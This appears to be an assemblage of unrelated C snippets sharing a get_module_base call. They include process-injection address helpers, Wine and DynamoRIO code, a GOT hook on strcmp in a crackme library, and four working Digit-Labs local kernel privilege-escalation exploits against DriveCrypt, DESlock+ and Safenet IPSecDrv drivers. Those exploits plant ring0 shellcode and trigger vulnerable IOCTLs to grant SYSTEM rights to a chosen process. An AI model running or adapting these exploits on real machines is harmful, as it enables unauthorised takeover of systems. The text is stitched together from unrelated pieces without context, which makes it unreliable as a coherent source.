void* get_remote_addr( pid_t target_pid, const char* module_name, void* local_addr )
{
void* local_handle, *remote_handle;
local_handle = get_module_base( -1, module_name );
remote_handle = get_module_base( target_pid, module_name );
return (void *)( (uint32_t)local_addr - (uint32_t)local_handle + (uint32_t)remote_handle );
}
long get_remote_addr(pid_t target_pid, const char* module_name, void* local_addr)
{
void* local_handle, *remote_handle;
local_handle = get_module_base(0, module_name);
remote_handle = get_module_base(target_pid, module_name);
long ret_addr = (long)((uint32_t)local_addr + (uint32_t)remote_handle - (uint32_t)local_handle);
return ret_addr;
}
void* get_remote_addr( pid_t target_pid, const char* module_name, void* local_addr )
{
void* local_handle, *remote_handle;
local_handle = get_module_base( -1, module_name );
remote_handle = get_module_base( target_pid, module_name );
LOGD( "[+] get_remote_addr: local[%x], remote[%x]\n", local_handle, remote_handle );
return (void *)( (uint32_t)local_addr + (uint32_t)remote_handle - (uint32_t)local_handle );
}
void
init_dr_marker(dr_marker_t *marker)
{
/* not calling memset b/c windbg_cmds is large */
# ifdef DEBUG
marker->flags = DR_MARKER_DEBUG_BUILD;
# else
marker->flags = DR_MARKER_RELEASE_BUILD;
# endif
# ifdef PROFILE
marker->flags = DR_MARKER_PROFILE_BUILD;
# endif
/* make sure we set one of the above flags and not more then one */
ASSERT(TESTANY(DR_MARKER_BUILD_TYPES, marker->flags) &&
((DR_MARKER_BUILD_TYPES & marker->flags) &
((DR_MARKER_BUILD_TYPES & marker->flags) - 1)) == 0);
/* TODO : add any additional flags? */
marker->build_num = BUILD_NUMBER;
marker->dr_base_addr = get_module_base((app_pc)init_dr_marker);
marker->dr_generic_nudge_target = (void *)generic_nudge_target;
# ifdef HOT_PATCHING_INTERFACE
marker->dr_hotp_policy_status_table = (void *)hotp_policy_status_table;
# else
marker->dr_hotp_policy_status_table = NULL;
# endif
marker->dr_marker_version = DR_MARKER_VERSION_CURRENT;
marker->stats = get_dr_stats();
dr_marker_magic_init(NT_CURRENT_PROCESS, marker);
marker->windbg_cmds[0] = '\0';
}
/**
* calculate the address of the module in target process
*/
void* get_remote_addr( pid_t target_pid, const char* module_name, void* local_addr )
{
void* local_module_base, *remote_module_base;
// local and remote process both have a module named module_name
local_module_base = get_module_base( -1, module_name );
remote_module_base = get_module_base( target_pid, module_name );
DEBUG_PRINT( "[+] get_remote_addr: local[%x], remote[%x]\n", \
local_module_base, remote_module_base );
// symbols in module each have a fixed offset
// for example, mmap() has a fixed offset in libc.so
return (void *)( (uint32_t)local_addr + (uint32_t)remote_module_base \
- (uint32_t)local_module_base );
}
void* get_remote_addr(pid_t target_pid, const char* module_name, void* local_addr)
{
void* local_handle, *remote_handle;
local_handle = get_module_base(-1, module_name);
remote_handle = get_module_base(target_pid, module_name);
DEBUG_PRINT("[+] get_remote_addr: local[%x], remote[%x]\n", local_handle, remote_handle);
void * ret_addr = (void *)((uint32_t)local_addr + (uint32_t)remote_handle - (uint32_t)local_handle);
#if defined(__i386__)
if (!strcmp(module_name, libc_path)) {
ret_addr += 2;
}
#endif
return ret_addr;
}
/* 获取目标进程内某个动态库函数module_name的某函数在该进程的虚拟内存的地址
* local_addr存放该函数在tracer所在位置
* */
void* get_remote_addr(pid_t target_pid, const char* module_name, void* local_addr)
{
void* local_handle, *remote_handle;
// tracer内相应动态库地址
local_handle = get_module_base(-1, module_name);
// tracee内相应动态库地址
remote_handle = get_module_base(target_pid, module_name);
DEBUG_PRINT("[+] get_remote_addr: local[%x], remote[%x]\n", local_handle, remote_handle);
// local_addr - local_handle = offset, 再加上remote_handle, 得到目标进程相应函数的地址
// 因为同一module_name动态库内某函数所在位置是一致的,所以对于tracer和trace offset是相同的
// 只要找到动态库在目标进程的位置,再加上offset即是该函数在tracee的位置
void * ret_addr = (void *)((uint32_t)local_addr + (uint32_t)remote_handle - (uint32_t)local_handle);
#if defined(__i386__)
if (!strcmp(module_name, libc_path)) {
ret_addr += 2;
}
#endif
return ret_addr;
}
/**********************************************************************
* PE_LoadResource
*/
HGLOBAL PE_LoadResource( HMODULE hmod, HRSRC hRsrc )
{
DWORD offset;
const void *base = get_module_base( hmod );
if (!hRsrc || !base) return 0;
offset = ((PIMAGE_RESOURCE_DATA_ENTRY)hRsrc)->OffsetToData;
if (is_data_file_module(hmod))
return (HANDLE)get_data_file_ptr( base, offset );
else
return (HANDLE)((char *)base + offset);
}
/**********************************************************************
* get_resdir
*
* Get the resource directory of a PE module
*/
static const IMAGE_RESOURCE_DIRECTORY* get_resdir( HMODULE hmod )
{
const IMAGE_DATA_DIRECTORY *dir;
const IMAGE_RESOURCE_DIRECTORY *ret = NULL;
const void *base = get_module_base( hmod );
if (base)
{
dir = &PE_HEADER(base)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_RESOURCE];
if (dir->Size && dir->VirtualAddress)
{
if (is_data_file_module(hmod)) ret = get_data_file_ptr( base, dir->VirtualAddress );
else ret = (IMAGE_RESOURCE_DIRECTORY *)((char *)base + dir->VirtualAddress);
}
}
return ret;
}
int main ( int argc , char *argv [] )
{
SNAPSHOT_HEADER header;
DUMPBLOCKV10 block;
unsigned int filelen = 0;
unsigned int sections;
void *module_base = 0x10000000;
void *data;
FILE *f1;
FILE *f2;
/* Chequeo los paramentros */
if ( ( argc != 3 ) && ( argc != 4 ) )
{
printf ( "\nfsnap v1.1\n" );
printf ( "Created by Nicolas A. Economou\n" );
printf ( "Core Security Technologies, Buenos Aires, Argentina (2015)\n" );
printf ( "\nUse: fsnap input_file output_file [-force_base]\n" );
return ( 0 );
}
/* Si quiero que CARGUE el MODULO en la BASE ORIGINAL */
if ( argc == 4 )
{
/* Si NO es el comando CORRECTO */
if ( strcmp ( argv [ 3 ] , "-force_base" ) != 0 )
{
printf ( "\nUse: fsnap input_file output_file [-force_base]\n" );
return ( 0 );
}
}
/* Si el FILE existe */
if ( is_filename_ok ( argv [ 1 ] ) == TRUE )
{
/* Si es la PRIMERA CORRIDA */
if ( argc == 3 )
{
/* Si pude cargar el MODULO en MEMORIA */
if ( is_loadable_module ( argv [ 1 ] , FALSE , &module_base ) == TRUE )
{
/* Si la BASE es DISTINTA de donde ESTA CARGADO */
if ( get_module_base ( argv [ 1 ] ) != ( void * ) module_base )
{
/* Si PUDE CARGAR el MODULO en la BASE */
if ( get_valid_loading ( argv [ 1 ] , argv [ 2 ] ) == TRUE )
{
/* Salgo OK */
return ( 1 );
}
}
/* Creo un SNAPSHOT del MODULO */
create_snapshot ( argv [ 1 ] , module_base , argv [ 2 ] );
}
/* Si el file NO ES LOADABLE ( puede ser un file de otro OS, un shellcode, etc ) */
else
{
/* Creo el OUTPUT FILE */
f2 = fopen ( argv [ 2 ] , "wb" );
/* Si el file NO pudo ser creado */
if ( f2 == NULL )
{
printf ( "Error: Invalid output_file\n" );
return ( 0 );
}
/* Abro el file */
f1 = fopen ( argv [ 1 ] , "rb" );
/* Obtengo el size del file */
filelen = get_file_len ( f1 );
/* Seteo el header del file */
header.sig = 0x70616E73;
header.version = 1;
header.flags = 0x80000000; // Fake memory dump
header.blockcount = 1;
fwrite ( &header , sizeof ( header ) , 1 , f2 );
/* Seteo la UNICA SECCION del SNAPSHOT */
block.BaseAddress = 0x10000000;
block.RegionSize = filelen;
block.Protect = READABLE | WRITABLE | EXECUTABLE;
fwrite ( &block , sizeof ( block ) , 1 , f2 );
/* Dumpeo la data */
data = malloc ( filelen );
fread ( data , filelen , 1 , f1 );
fwrite ( data , filelen , 1 , f2 );
/* Mensaje al usuario */
printf ( "[x] Setting ARBITRARY image base at: %.8x\n" , block.BaseAddress );
/* Cierro el file */
fclose ( f1 );
/* Cierro el file */
fclose ( f2 );
}
}
/* Si es una CORRIDA AUXILIAR (para intentar MAPEAR en la BASE) */
else
{
/* Si pude cargar el MODULO en MEMORIA */
if ( is_loadable_module ( argv [ 1 ] , TRUE , &module_base ) == TRUE )
{
/* Creo un SNAPSHOT del MODULO */
create_snapshot ( argv [ 1 ] , module_base , argv [ 2 ] );
/* Retorno OK */
return ( 1 );
}
/* Si NO se PUDO MAPEAR en la BASE */
else
{
/* Salgo con ERROR */
return ( 0 );
}
}
}
/* Si hubo algun ERROR */
else
{
printf ( "Error: Invalid input_file\n" );
return ( 0 );
}
return ( 1 );
}
int is_loadable_module ( char *filename , int force_base , void **base_address )
{
HANDLE fmapping;
HANDLE module;
void *real_module_base;
void *my_base_address;
int ret = FALSE;
/* Abro el file */
module = CreateFile ( filename , GENERIC_READ | GENERIC_EXECUTE , FILE_SHARE_READ , NULL , OPEN_EXISTING , NULL , NULL );
// printf ( "module = %x\n" , module );
/* Si el file pudo ser ABIERTO */
if ( module != NULL )
{
/* Intento cargar el modulo */
fmapping = CreateFileMapping ( module , NULL , PAGE_EXECUTE_READ | SEC_IMAGE , NULL , NULL , "mapped" );
// printf ( "fmapping = %x\n" , fmapping );
/* Si el modulo pudo ser cargado */
if ( fmapping != NULL )
{
/* Si Tengo que CARGARLO en la BASE */
if ( force_base == TRUE )
{
/* Obtengo la BASE del MODULO */
real_module_base = get_module_base ( filename );
}
/* Si NO IMPORTA donde lo carga */
else
{
/* Dejo que el OS lo cargue donde puede */
real_module_base = NULL;
}
/* Intento cargar el modulo */
my_base_address = MapViewOfFileEx ( fmapping , FILE_MAP_EXECUTE , 0 , 0 , 0 , real_module_base );
// printf ( "ERROR: %i\n" , GetLastError () );
// printf ( "my_base_address = %x\n" , my_base_address );
/* Si el modulo pudo ser cargado */
if ( my_base_address != NULL )
{
/* Retorno la BASE del MODULO */
*base_address = my_base_address;
/* Retorno OK */
ret = TRUE;
}
}
/* Si el FILE NO PUDO ser MAPEADO */
else
{
/* Si NO IMPORTA donde SE CARGA */
if ( force_base == FALSE )
{
/* Si es un modulo VALIDO */
if ( is_windows_module ( filename ) == TRUE )
{
/* Cargo el modulo DONDE PUEDO ( solo valido para OSs arcaicos ) */
module = LoadLibraryEx ( filename , NULL , DONT_RESOLVE_DLL_REFERENCE );
/* Si el MODULO pudo ser CARGADO */
if ( module != NULL )
{
/* Retorno la BASE del MODULO */
*base_address = ( void * ) module;
/* Retorno OK */
ret = TRUE;
}
}
}
}
}
return ( ret );
}
int
main (int argc, char **argv)
{
struct ioctl_req req;
CHAR buf[1024], buf1[8], buf2[0x88+1];
DWORD rlen, zlen, ppid;
LPVOID zpage, zbuf, base;
HANDLE hFile;
BOOL result;
printf ("DriveCrypt <= 5.3 local kernel ring0 SYSTEM exploit\n"
"by: <*****@*****.**>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n");
if (argc <= 1)
{
fprintf (stderr, "Usage: %s <processid to elevate>\n", argv[0]);
exit (EXIT_SUCCESS);
}
ppid = atoi (argv[1]);
hFile = CreateFileA ("\\\\.\\DCR", FILE_EXECUTE,
FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
exit (EXIT_FAILURE);
}
memset (&req, 0, sizeof req);
req.action = 0x153;
req.flag = 0;
req.ptr = buf;
printf ("* enabling driver...\n");
result = DeviceIoControl (hFile, DCR_IOCTL,
&req, sizeof req, &req, sizeof req, &rlen, 0);
if (!result)
{
fprintf (stderr, "* DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
printf ("** version: 0x%08X [%s], %s\n", *(int *) &buf[8], &buf[12], &buf[19]);
printf ("* done\n");
zpage = VirtualAlloc ((LPVOID) 0x610000, 0x10000,
MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (zpage == NULL)
{
fprintf (stderr, "* VirtualAlloc failed\n");
exit (EXIT_FAILURE);
}
printf ("* allocated page: 0x%08X [%d-bytes]\n",
zpage, 0x10000);
base = get_module_base ();
if (base == NULL)
{
fprintf (stderr, "* unable to find DCR.sys base\n");
exit (EXIT_FAILURE);
}
printf ("* DCR.sys base: 0x%08X\n", base);
memset (zpage, 0xCC, 0x10000);
zbuf = fixup_ring0_shell (base, ppid, &zlen);
memcpy ((LPVOID) zpage + 0x61, win32_fixup, sizeof (win32_fixup) - 1);
memcpy ((LPVOID) (zpage + 0x61 + sizeof (win32_fixup) - 1), zbuf, zlen);
memcpy ((LPVOID) (zpage + 0x61 + sizeof (win32_fixup) + zlen - 1),
win32_ret, sizeof (win32_ret) - 1);
memset (&req, 0, sizeof req);
req.action = 79;
req.flag = 0;
memset (buf1, 0x41, sizeof buf1);
buf1[sizeof buf1 - 1] = 0;
req.arg1 = buf1;
memset (buf2, 0x61, sizeof buf2);
buf2[sizeof buf2 - 1] = 0;
req.arg2 = buf2;
req.ptr = buf;
printf ("* hitting.. ");
fflush (stdout);
result = DeviceIoControl (hFile, DCR_IOCTL,
&req, sizeof req, &req, sizeof req, &rlen, 0);
if (!result)
{
fprintf (stderr, "* DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
printf ("done\n\n"
"* hmmm, you didn't STOP the box?!?!\n");
CloseHandle (hFile);
return (EXIT_SUCCESS);
}
int
main (int argc, char **argv)
{
struct ioctl_req req;
DWORD disk_no, i, rlen, zlen, ppid;
CHAR rbuf[64], sbuf[512];
LPVOID zpage, zbuf, base;
HANDLE hFile;
BOOL result;
printf ("DESlock+ <= 3.2.6 local kernel ring0 SYSTEM exploit\n"
"by: <*****@*****.**>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
if (argc <= 1)
{
fprintf (stderr, "Usage: %s <processid to elevate>\n", argv[0]);
exit (EXIT_SUCCESS);
}
ppid = atoi (argv[1]);
hFile = CreateFileA ("\\\\.\\DLKFDisk_Control", FILE_EXECUTE,
FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
exit (EXIT_FAILURE);
}
for (i = 0; i < DLKFDISK_DISK_MAX; i++)
{
memset (&req, 0, sizeof req);
req.arg[0] = (void *) 0xDEADBEEF;
req.arg[1] = (void *) 0xDEADBEEF;
req.arg[2] = (void *) 0xDEADBEEF;
req.arg[3] = (void *) i; /* drive number */
req.arg[4] = (void *) sizeof sbuf; /* buffer size */
req.arg[5] = (void *) sbuf; /* buffer pointer */
result = DeviceIoControl (hFile, DLKFDISK_IOCTL,
&req, sizeof req, rbuf, sizeof rbuf, &rlen, 0);
if (!result)
{
fprintf (stderr, "* DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
if (strlen (sbuf + DLKFDISK_OFFSET - 1) > 6 &&
strcmp (sbuf + DLKFDISK_OFFSET - 1 + 6, ":\\XXXAAAA.mnt") == 0)
{
disk_no = i;
break;
}
}
printf ("* write buf: \"%s\"\n", &sbuf[DLKFDISK_OFFSET - 1]);
zpage = VirtualAlloc ((LPVOID) 0x41410000, 0x10000,
MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (zpage == NULL)
{
fprintf (stderr, "* VirtualAlloc failed\n");
exit (EXIT_FAILURE);
}
printf ("* allocated page: 0x%08X [%d-bytes]\n",
zpage, 0x10000);
base = get_module_base ();
if (base == NULL)
{
fprintf (stderr, "* unable to find dlkfdisk.sys base\n");
exit (EXIT_FAILURE);
}
printf ("* dlkfdisk.sys base: 0x%08X\n", base);
memset (zpage, 0xCC, 0x10000);
zbuf = fixup_ring0_shell (base, ppid, &zlen);
memcpy ((LPVOID) 0x41414141, win32_fixup, sizeof (win32_fixup) - 1);
memcpy ((LPVOID) (0x41414141 + sizeof (win32_fixup) - 1), zbuf, zlen);
memcpy ((LPVOID) (0x41414141 + sizeof (win32_fixup) + zlen - 1),
win32_ret, sizeof (win32_ret) - 1);
memset (&req, 0, sizeof req);
req.arg[0] = (void *) 0xDEADBEEF;
req.arg[1] = (void *) 0xDEADBEEF;
req.arg[2] = (void *) 0xDEADBEEF;
req.arg[3] = (void *) disk_no; /* drive number */
req.arg[4] = (void *) 512; /* buffer size */
req.arg[5] = (void *) (base + DLKFDISK_SLOT - DLKFDISK_OFFSET); /* buffer pointer */
printf ("* overwriting [@0x%08X %d-bytes].. ",
base + DLKFDISK_SLOT, strlen (sbuf + DLKFDISK_OFFSET - 1) + 1);
result = DeviceIoControl (hFile, DLKFDISK_IOCTL,
&req, sizeof req, rbuf, sizeof rbuf, &rlen, 0);
if (!result)
{
fprintf (stderr, "DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
printf ("done\n");
/* jump to our address :) */
printf ("* jumping.. ");
result = DeviceIoControl (hFile, DLKFDISK_R_IOCTL,
&req, sizeof req, rbuf, sizeof rbuf, &rlen, 0);
if (!result)
{
fprintf (stderr, "DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
printf ("done\n\n"
"* hmmm, you didn't STOP the box?!?!\n");
CloseHandle (hFile);
return (EXIT_SUCCESS);
}
int
main (int argc, char **argv)
{
struct ioctl_req req;
LPVOID c_addr, p_addr;
LPVOID zpage, zbuf, base, pbase;
DWORD rlen, zlen, ppid;
HANDLE hFile;
BOOL result;
printf ("Safenet IPSecDrv.sys <= 10.4.0.12 local kernel ring0 SYSTEM
exploit\n"
"by: <*****@*****.**>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
if (argc <= 1)
{
fprintf (stderr, "Usage: %s <processid to elevate>\n", argv[0]);
exit (EXIT_SUCCESS);
}
ppid = atoi (argv[1]);
hFile = CreateFileA ("\\\\.\\IPSecDrv", FILE_EXECUTE,
FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
exit (EXIT_FAILURE);
}
zpage = VirtualAlloc (NULL, 0x10000, MEM_RESERVE|MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
if (zpage == NULL)
{
fprintf (stderr, "* VirtualAlloc failed\n");
exit (EXIT_FAILURE);
}
printf ("* allocated page: 0x%08X [%d-bytes]\n",
zpage, 0x10000);
c_addr = zpage;
base = get_module_base ();
p_addr = (LPVOID) ((DWORD) ((LPVOID) &c_addr - (base + 0x1C604)) /
16);
printf ("* base: 0x%08X, p: 0x%08X\n", base + 0x1C604, &c_addr);
printf ("* call distance: 0x%08X\n", p_addr);
memset (zpage, 0xCC, 0x10000);
zbuf = fixup_ring0_shell (base, ppid, &zlen);
memcpy (zpage, win32_fixup, sizeof (win32_fixup) - 1);
memcpy (zpage + sizeof (win32_fixup) - 1, zbuf, zlen);
memcpy (zpage + sizeof (win32_fixup) + zlen - 1,
win32_ret, sizeof (win32_ret) - 1);
memset (&req, 0, sizeof req);
req.arg[0] = p_addr;
/* jump to our address :) */
printf ("* jumping.. ");
result = DeviceIoControl (hFile, IPSECDRV_IOCTL,
&req, sizeof req, &req, sizeof req, &rlen,
0);
if (!result)
{
fprintf (stderr, "* DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
printf ("done\n\n"
"* hmmm, you didn't STOP the box?!?!\n");
CloseHandle (hFile);
return (EXIT_SUCCESS);
}
int hook_strcmp()
{
old_strcmp = strcmp;
LOGD("Orig strcmp = %p\n", old_strcmp);
void * base_addr = get_module_base(getpid(), LIBSF_PATH);
LOGD("libcrackme.so address = %p\n", base_addr);
int fd;
fd = open(LIBSF_PATH, O_RDONLY);
if (-1 == fd) {
LOGD("error\n");
return -1;
}
Elf32_Ehdr ehdr;
read(fd, &ehdr, sizeof(Elf32_Ehdr));
unsigned long shdr_addr = ehdr.e_shoff;
int shnum = ehdr.e_shnum;
int shent_size = ehdr.e_shentsize;
unsigned long stridx = ehdr.e_shstrndx;
Elf32_Shdr shdr;
lseek(fd, shdr_addr + stridx * shent_size, SEEK_SET);
read(fd, &shdr, shent_size);
char * string_table = (char *)malloc(shdr.sh_size);
lseek(fd, shdr.sh_offset, SEEK_SET);
read(fd, string_table, shdr.sh_size);
lseek(fd, shdr_addr, SEEK_SET);
int i;
uint32_t out_addr = 0;
uint32_t out_size = 0;
uint32_t got_item = 0;
int32_t got_found = 0;
for (i = 0; i < shnum; i++) {
read(fd, &shdr, shent_size);
if (shdr.sh_type == SHT_PROGBITS) {
int name_idx = shdr.sh_name;
if (strcmp(&(string_table[name_idx]), ".got.plt") == 0
|| strcmp(&(string_table[name_idx]), ".got") == 0) {
out_addr = base_addr + shdr.sh_addr;
out_size = shdr.sh_size;
LOGD("out_addr = %lx, out_size = %lx\n", out_addr, out_size);
for (i = 0; i < out_size; i += 4) {
// LOGD("loop\n");
got_item = *(uint32_t *)(out_addr + i);
if (got_item == old_strcmp) {
LOGD("Found strcmp in got\n");
got_found = 1;
uint32_t page_size = getpagesize();
uint32_t entry_page_start = (out_addr + i) & (~(page_size - 1));
mprotect((uint32_t *)entry_page_start, page_size, PROT_READ | PROT_WRITE);
*(uint32_t *)(out_addr + i) = new_strcmp;
break;
} else if (got_item == new_strcmp) {
LOGD("Already hooked\n");
break;
}
}
if (got_found)
break;
}
}
}
free(string_table);
close(fd);
}
int
main (int argc, char **argv)
{
struct ioctl_req req;
DWORD dResult, rlen, zpage_len, zlen, ppid;
LPVOID zpage, zbuf, base;
CHAR rbuf[64];
HANDLE hFile;
BOOL bResult;
printf ("DESlock+ <= 3.2.6 local kernel ring0 link list zero SYSTEM exploit\n"
"by: <*****@*****.**>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
if (argc <= 1)
{
fprintf (stderr, "Usage: %s <processid to elevate>\n", argv[0]);
exit (EXIT_SUCCESS);
}
ppid = atoi (argv[1]);
hFile = CreateFileA ("\\\\.\\DLKPFSD_Device", FILE_EXECUTE,
FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
exit (EXIT_FAILURE);
}
zpage_len = 0x7FFF;
zpage = (LPVOID) 0x00000001;
dResult = NtAllocateVirtualMemory ((HANDLE) -1, &zpage, 0, &zpage_len,
MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE);
if (dResult != STATUS_SUCCESS)
{
fprintf (stderr, "* NtAllocateVirtualMemory failed\n");
exit (EXIT_FAILURE);
}
printf ("* allocated page: 0x%08X [%d-bytes]\n",
zpage, 0x7FFF);
base = get_module_base ();
if (base == NULL)
{
fprintf (stderr, "* unable to find dlkfdisk.sys base\n");
exit (EXIT_FAILURE);
}
printf ("* dlkfdisk.sys base: 0x%08X\n", base);
memset (zpage, 0xCC, 0x7FFF);
zbuf = fixup_ring0_shell (base, ppid, &zlen);
memcpy ((LPVOID) zpage, win32_fixup, sizeof (win32_fixup) - 1);
memcpy ((LPVOID) (zpage + sizeof (win32_fixup) - 1), zbuf, zlen);
memcpy ((LPVOID) (zpage + sizeof (win32_fixup) + zlen - 1),
win32_ret, sizeof (win32_ret) - 1);
memset (&req, 0, sizeof req);
req.arg[0] = (void *) DLMFENC_FLAG;
req.arg[1] = (void *) 0x12;
req.arg[2] = (void *) (base + DLKFDISK_SLOT); /* overwrite pointer */
printf ("* overwriting [@0x%08X %d-bytes].. ",
base + DLKFDISK_SLOT, 16);
xor_mask_req (&req);
bResult = DeviceIoControl (hFile, DLMFENC_IOCTL,
&req, sizeof req, &req, sizeof req, &rlen, 0);
if (!bResult)
{
fprintf (stderr, "DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
printf ("done\n");
CloseHandle (hFile);
hFile = CreateFileA ("\\\\.\\DLKFDisk_Control", FILE_EXECUTE,
FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
exit (EXIT_FAILURE);
}
/* jump to our address :) */
printf ("* jumping.. ");
bResult = DeviceIoControl (hFile, DLKFDISK_R_IOCTL,
&rbuf, sizeof rbuf, &rbuf, sizeof rbuf, &rlen, 0);
if (!bResult)
{
fprintf (stderr, "DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
printf ("done\n\n"
"* hmmm, you didn't STOP the box?!?!\n");
CloseHandle (hFile);
return (EXIT_SUCCESS);
}